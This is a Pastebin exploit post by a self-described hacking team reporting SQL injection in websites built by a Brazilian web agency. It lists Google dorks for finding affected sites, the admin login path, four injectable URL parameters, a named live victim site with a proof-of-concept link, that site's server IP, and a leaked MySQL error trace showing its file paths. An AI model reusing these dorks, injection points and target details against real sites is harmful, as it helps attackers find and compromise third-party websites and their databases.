KingSkrupellos

Vale Mais Comunicação SQL Injection

Jan 16th, 2019
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.60 KB | None | 0 0
  1. ##########################################################
  2.  
  3. # Exploit Title : Vale Mais Comunicação SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 17/01/2019
  7. # Vendor Homepage : valemais.net
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Desenvolvido por Vale Mais Comunicação''
  12. intext:''© 2008-2013 | www.valemais.net''
  13. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  14. Special Elements used in an SQL Command ('SQL Injection') ]
  15.  
  16. ##########################################################
  17.  
  18. # Admin Panel Login Path :
  19. *************************
  20. /admin/
  21.  
  22. # SQL Injection Exploit :
  23. ***********************
  24.  
  25. /projeto.php?id=[SQL Injection]
  26.  
  27. /noticias.php?id=[SQL Injection]
  28.  
  29. /produto.php?cat=[SQL Injection]
  30.  
  31. /produto.php?cat=[ID-NUMBER]&gr=&id=[SQL Injection]
  32.  
  33. ##########################################################
  34.  
  35. # Example Vulnerable Site :
  36. *************************
  37.  
  38. [+] clam.ind.br/projeto.php?id=2%27 =>
  39.  
  40. [ Proof of Concept ] => archive.is/niemC
  41.  
  42. Note : (187.17.111.100) => There are 8,650 domains hosted on this server.
  43.  
  44. ##########################################################
  45.  
  46. # SQL Database Error :
  47. **********************
  48.  
  49. Fatal error: Uncaught exception 'Exception' with message 'MySQL:
  50. You have an error in your SQL syntax; check the manual that corresponds to
  51. your MySQL server version for the right syntax to use near ''2'' ORDER BY
  52. codigo ASC' at line 1' in /var/www/html/clam.ind.br/web/beam/system
  53. /Connection.class.php:110 Stack trace: #0 /var/www/html/clam.ind.br/web
  54. /beam/system/Connection.class.php(83): Connection->throwSqlError() #1
  55. /var/www/html/clam.ind.br/web/beam/system/Beam.class.php(134):
  56. Connection->query('SELECT * FROM s...') #2 /var/www/html/clam.ind.br
  57. /web/beam/system/Beam.class.php(131): Beam->fetchSelect('SELECT *
  58. FROM s...') #3 /var/www/html/clam.ind.br/web/beam/system/Beam.class.php
  59. (181): Beam->buscar('SELECT * FROM s...') #4 /var/www/html/clam.ind.br
  60. /web/beam/system/Beam.class.php(128): Beam->buscarTabela('', -1, 1, 'ASC',
  61. 'codigo = '2''') #5 /var/www/html/clam.ind.br/web/beam/system/Beam.class.php
  62. (150): Beam->buscar('codigo = '2''') #6 /var/www/html/clam.ind.br/web
  63. /projeto.php(8): Beam->buscarChave('2'') #7 {main} thro in /var/www
  64. /html/clam.ind.br/web/beam/system/Connection.class.php on line 110
  65.  
  66. ##########################################################
  67.  
  68. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  69.  
  70. ##########################################################
Add Comment
Please, Sign In to add comment